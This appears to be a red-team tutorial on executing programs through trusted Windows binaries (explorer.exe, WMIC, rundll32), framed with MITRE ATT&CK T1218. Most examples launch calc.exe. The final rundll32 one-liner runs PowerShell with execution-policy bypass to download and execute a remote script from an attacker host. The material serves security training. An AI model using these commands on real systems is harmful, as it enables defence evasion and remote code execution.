File execution

File Explorer

File Explorer is a pre-installed file manager and system component for Windows. People found that using the file explorer binary can execute other .exe files. This technique is called Indirect Command Execution, where the explorer.exe tool can be used and abused to launch malicious scripts or executables from a trusted parent process.

The explorer.exe binary is located at:

C:\Windows\explorer.exe for the Windows 32 bits version
C:\Windows\SysWOW64\explorer.exe for the Windows 64 bits version

In order to create a child process of explorer.exe parent (in this case calc.exe):

explorer.exe /root,"C:\Windows\System32\calc.exe"

WMIC

WMIC

Windows Management Instrumentation (WMIC) is a Windows command-line utility that manages Windows components. People found that WMIC is also used to execute binaries for evading defensive measures. The MITRE ATT&CK framework refers to this technique as Signed Binary Proxy Execution (T1218)

To create a new process of a binary of our choice (in this case calc.exe again):

wmic.exe process call create calc

Rundll32

Rundll32 is a pre-installed tool on Windows that loads and runs Dynamic Link Library DLL files within the OS. A red team can abuse and leverage rundll32.exe to run arbitrary payloads and execute JavaScript and PowerShell scripts. The MITRE ATT&CK framework identifies this as “Signed Binary Proxy Execution: Rundll32” (T1218).

The rundll32.exe binary is located at:

C:\Windows\System32\rundll32.exe for the Windows 32 bits version
C:\Windows\SysWOW64\rundll32.exe for the Windows 64 bits version

To execute a calc.exe binary as proof of concept using the rundll32.exe binary:

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

To run a JavaScript that executes a PowerShell script to download from a remote website using rundll32.exe:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://AttackBox_IP/script.ps1');");